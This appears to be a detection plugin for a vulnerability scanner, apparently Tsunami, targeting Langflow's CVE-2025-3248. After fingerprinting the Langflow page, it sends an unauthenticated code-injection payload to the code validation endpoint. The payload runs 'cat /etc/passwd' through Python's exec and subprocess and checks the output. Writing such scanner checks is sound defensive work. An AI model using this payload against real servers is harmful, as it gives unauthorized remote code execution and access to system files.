# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
  type: VULN_DETECTION
  name: "Langflow_CVE_2025_3248"
  author: "frkngksl"
  version: "1.0"
}

finding: {
  main_id: {
    publisher: "GOOGLE"
    value: "CVE-2025-3248"
  }
  severity: CRITICAL
  title: "Remote code execution affecting Langflow (CVE-2025-3248)"
  description: "Vulnerable Langflow versions are susceptible to code injection in the code validation endpoint. A remote and unauthenticated attacker can send crafted HTTP requests from this endpoint to execute arbitrary Python code."
  recommendation: "Update the version to 1.3.0 or later with the authentication option enabled."
  related_id: {
    publisher: "CVE"
    value: "CVE-2025-3248"
  }
}

config: {}

###########
# ACTIONS #
###########

actions: {
  name: "fingerprint_langflow"
  http_request: {
    method: GET
    uri: "/"
    response: {
      expect_all: {
        conditions: [
          { body: {} contains: "<title>Langflow</title>" }
        ]
      }
    }
  }
}

actions: {
  name: "trigger_code_execution"
  http_request: {
    method: POST
    uri: "/api/v1/validate/code"
    headers: [
      { name: "Accept" value: "application/json" },
      { name: "Content-Type" value: "application/json" }
    ]
    data: "{\"code\": \"def run(cd=exec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"cat /etc/passwd\\\", shell=True))')): pass\"}"
    response: {
      http_status: 200
      expect_all: {
        conditions: [
          { body: {} contains: "root:x:0:0:root" }
        ]
      }
    }
  }
}


#############
# WORKFLOWS #
#############

workflows: {
  actions: [
    "fingerprint_langflow",
    "trigger_code_execution"
  ]
}
